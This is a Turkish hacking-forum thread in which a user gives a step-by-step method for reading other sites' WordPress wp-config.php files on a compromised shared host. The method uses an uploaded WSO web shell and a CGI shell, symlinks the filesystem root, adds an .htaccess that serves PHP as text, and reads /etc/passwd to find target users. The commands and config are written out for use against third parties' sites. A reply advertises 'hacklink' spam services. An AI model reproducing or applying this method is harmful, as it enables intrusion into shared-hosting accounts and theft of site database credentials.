Manuel Config Bypass Method //Anarchosa (1 Viewer)

A

Anarchosa

Beyler bu method her sw'de işe yaramaz ama yinede paylaşmak istedim.

C1'e Benziyor ama değil.

İlk olarak sitemize wso shell upload edip, herhangi bir dizinde yeni bir klasör açıyoruz.
Örneğin ben

Code:
mkdir /home/user/public_html/wp-content/themes/ Anarchosa

Yani Temalar klasörünün içinde Anarchosa adında bir klasör oluşturdum varsayın. Ben manuel oluşturdum siz kısayoldan oluşturabilirsiniz.

Şimdi klasörün içine girelim.

Execute yani console kısmından şu komutu yazın.

Code:
ln -s / root
Tamamdır kök dizinini Anarchosa klasörünün içine çekmiş olduk.

Şimdi vereceğim .htaccess dosyasını Anarchosa klasörüne upload edip, url üzerinde txt dosyalarını görüntüleme yetkisi alıyoruz.

.htaccess

Code:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php

Şimdi yapmamız gereken /var/named veya siteler nerde bulunuyorsa vhosts vs. Oraya girin ve kendinize hedef bir site seçin.. Diyelim sitemizin ismi orospucocu.com.. Hedefimizi belirledik.

Şimdi sitenin useri, yani hosttaki kullanıcı adını öğrenmeliyiz. Bunun için en iyi yöntem
Code:
cat /etc/passwd
ile userleri çekin ve pc tuşları ile ctrl + f tuşuna basın.

Arama metni çıkıcak. Oraya orospucocu.com yazarsanız sitenin kullanıcı adını yüksek ihtimalle bulursunuz. Bizim kullanıcı adımız alperseyyar çıktı.

Tamamdır şimdi burda yapmanız gereken sitenin hangi script ile yapıldığını öğrenmek.

Biz araştırdık ve orospucocu.com'un wordpress bir site olduğunu öğrendik.

Şimdi wso shellde change dir kısmına
Code:
/home/alperseyyar/
yazıyoruz yüksek ihtimalle hata alıcaksınız. Şimdi
Code:
/home/alperseyyar/public_html
yazın.
Ve orospucocu.php'nin içine erişim sağlamış olacaksınız. Tabi her zaman bu yöntem işe yaramıyor hatta genellikle işe yaramıyor sebebi ise cgi telnet kullanmadığımızdan kaynaklanıyor.

Şimdi birtane cgi shell upload edelim.
Ve cgiye geçiş yapalım.

Şimdi cgi komut satırımıza;
Code:
cd /
Yazıp, kök dizine gidelim.

Şimdi ise;

Code:
cd /home/alperseyyar/

yazdıktan sonra yüksek ihtimlle erişim sağlarsınız. Şimdi ise;

Code:
 cd public_html veya cd www
Yazıp ana dizine erişim sağlayın.
Nasıl olsa wordpress.
ana dizine erişim sağladınız diyelim şimdi sırada;

Code:
cat wp-config.php
yazarak config bilgilerini okuyabilirsiniz. Eğer cat işe yaramazsa ki çok düşük ihtimal..
ln -s komutu ile confiği txt dosyasına çevirip o şekilde okuyabilirsiniz.

Diyelim sw cgi shelldeki komutlarda da hata veriyor.

İlk baştan beri merak ediyor olabilirsiniz neden htaccess dosyası oluşturduğumuzu. İşte bize şuan lazım olucak.

Anarchosa klasörümüzün içerisinde root adında bir kök dizin ve .htaccess dosyamız vardı öyle değil mi ?

Şimdi urlnin sonuna şöyle yapın;

Code:
bulundugumuzsite/wp-content/Anarchosa/root/

Yazdığınız zaman karşınıza dizinler gelecek..

Bundan sonra yapmanız gereken kolay hedef sitemiz orospucocu.com'un kullanıcı adı neydi alperseyyar dı

Urlnin sonuna şöyle yazın;

Code:
bulundugumuzsite.com/Wp-content/themes/Anarchosa/root/home/alperseyyar/public_html/

Ve karşınıza dosyalar çıkacak... Bundan sonra bypass etme şekliniz size bağlı benden bu kadar dilerseniz konsol üzerinde html olarak açın config dosyasını dilerseniz de txt ile açmaya çalışın perm yerseniz sağlık olsun.
O swyi bu methodla geçemeyeceksiniz demektir.

Last edited by a moderator:

BoneLess

At hırsızı
Credits
0
Rating - 0%
Benim ilk bildiklerim ama kanka ilkler için aşkım yararlı yalarun seni ehshdhdhhd siten varsa hacklink yapam 3 günde 100k garanti

A

Anarchosa

Benim ilk bildiklerim ama kanka ilkler için aşkım yararlı yalarun seni ehshdhdhhd siten varsa hacklink yapam 3 günde 100k garanti
aşkm tolan abiye çalışıyorum üzgünüm :/
<3 seni seviyorum yorumun için teşekkür ederim <3

Users who are viewing this thread